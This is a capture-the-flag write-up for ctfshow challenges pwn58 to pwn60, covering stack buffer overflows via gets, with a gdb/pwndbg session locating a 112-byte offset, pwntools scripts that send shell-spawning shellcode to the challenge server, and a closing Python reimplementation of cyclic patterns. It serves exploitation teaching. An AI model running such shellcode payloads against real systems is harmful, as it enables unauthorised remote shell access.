pwn58
checksec
32-bit
IDA analysis
Decompiling main fails; I suspect it was deliberately built that way.
So I just make do with analysing the assembly.
The rough call order is the logo function first, then the ctfshow function.
The logo function, as usual, has nothing of interest.
Into the ctfshow function.
The ctfshow function contains only a gets call.
I searched everywhere and found no backdoor function.
So just supply your own shellcode.
from pwn import *
p = remote("pwn.challenge.ctf.show",28305)
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
p.sendline(shellcode)
p.interactive()
pwn59
64-bit shellcode
Unlike the earlier 64-bit argument-passing challenges, there is no need to hunt for a place to set rdi or the like.
Just send the shellcode directly.
But the architecture must be set, or it won't work.
from pwn import *
p = remote("pwn.challenge.ctf.show",28125)
context.arch='amd64'
shellcode = asm(shellcraft.sh())
payload = shellcode
p.sendline(payload)
p.interactive()
pwn60
Slightly harder shellcode
checksec
32位
Look at the main function.
There is a gets call and a strncpy call.
The gets call is obviously where the overflow happens.
strncpy copies s into buf2.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 1, 0);
  puts("CTFshow-pwn can u pwn me here!!");
  gets(s);
  strncpy(buf2, s, 0x64u);
  printf("See you ~");
  return 0;
}
So use gdb to debug it dynamically and work out the offset.
gdb sometimes complains about missing permissions;
in that case run
chmod 777 pwn60
and then debug as normal.
The debugging session in full:
ctfshow@ubuntu:~/Desktop/xd$ chmod 777 pwn60
ctfshow@ubuntu:~/Desktop/xd$ gdb pwn60
GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 191 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from pwn60...done.
pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
pwndbg> r
Starting program: /home/ctfshow/Desktop/xd/pwn60
CTFshow-pwn can u pwn me here!!
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
See you ~
Program received signal SIGSEGV, Segmentation fault.
0x62616164 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────
EAX 0x0
EBX 0x0
ECX 0x9
EDX 0xf7fad890 (_IO_stdfile_1_lock) ◂— 0
EDI 0x0
ESI 0xf7fac000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1d7d8c
EBP 0x62616163 ('caab')
ESP 0xffffcf30 ◂— 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
EIP 0x62616164 ('daab')
─────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
Invalid address 0x62616164
─────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────
00:0000│ esp 0xffffcf30 ◂— 'eaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
01:0004│ 0xffffcf34 ◂— 'faabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
02:0008│ 0xffffcf38 ◂— 'gaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
03:000c│ 0xffffcf3c ◂— 'haabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
04:0010│ 0xffffcf40 ◂— 'iaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
05:0014│ 0xffffcf44 ◂— 'jaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
06:0018│ 0xffffcf48 ◂— 'kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
07:001c│ 0xffffcf4c ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab'
───────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────
► f 0 62616164
f 1 62616165
f 2 62616166
f 3 62616167
f 4 62616168
f 5 62616169
f 6 6261616a
f 7 6261616b
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> cyclic -l
usage: pwn cyclic [-h] [-a alphabet] [-n length] [-c context] [-l lookup_value | count]
pwn cyclic: error: argument -l/-o/--offset/--lookup: expected one argument
pwndbg> cyclic -l 62616164
[CRITICAL] Pattern contains characters not present in the alphabet
pwndbg> cyclic -l 0x62616164
112
That gives the actual offset.
With that, just send the shellcode directly: use ljust to pad it out to the offset, then append the address of buf2, where strncpy has placed a copy of it.
from pwn import *
context.log_level = 'debug'
p = remote("pwn.challenge.ctf.show", 28291)
e = ELF("./pwn60")
buf2 = e.sym['buf2']
shellcode = asm(shellcraft.sh())
payload = shellcode.ljust(112, b'a') + p32(buf2)
p.sendline(payload)
p.interactive()
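To show where the 112 in the gdb session above comes from, here is an added example (my own code, not the writeup's and not pwntools'): it builds the same de Bruijn pattern that pwndbg's cyclic emits and maps a crashed register value back to its offset. It also reproduces why cyclic -l 62616164 failed: without the 0x prefix the argument is read as a decimal integer, whose bytes are not in the pattern's alphabet.

```python
import struct

# Same alphabet and window size that pwndbg's `cyclic 200` used above.
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
WINDOW = 4  # one 32-bit register's worth of bytes

def de_bruijn(alphabet=ALPHABET, n=WINDOW):
    """FKM construction of the de Bruijn sequence B(k, n): every length-n
    window occurs exactly once, so the 4 bytes that land in EIP (or EBP)
    pin down a unique position in the input."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in seq)

def cyclic(length):
    """Equivalent of pwndbg's `cyclic <length>`."""
    return de_bruijn()[:length]

def cyclic_find(value, n=WINDOW):
    """Equivalent of `cyclic -l <value>`: offset of the window, or None.
    An int is unpacked little-endian, the order in which the bytes were
    read off the stack into the register (0x62616164 -> "daab")."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")
    if isinstance(value, bytes):
        value = value.decode("latin-1")
    if len(value) != n or any(c not in ALPHABET for c in value):
        return None  # decimal 62616164 packs to bytes outside the alphabet
    idx = de_bruijn().find(value)
    return idx if idx >= 0 else None

if __name__ == "__main__":
    print(cyclic(200))
    print(cyclic_find(0x62616164))  # 112: the crashed EIP from the gdb session
```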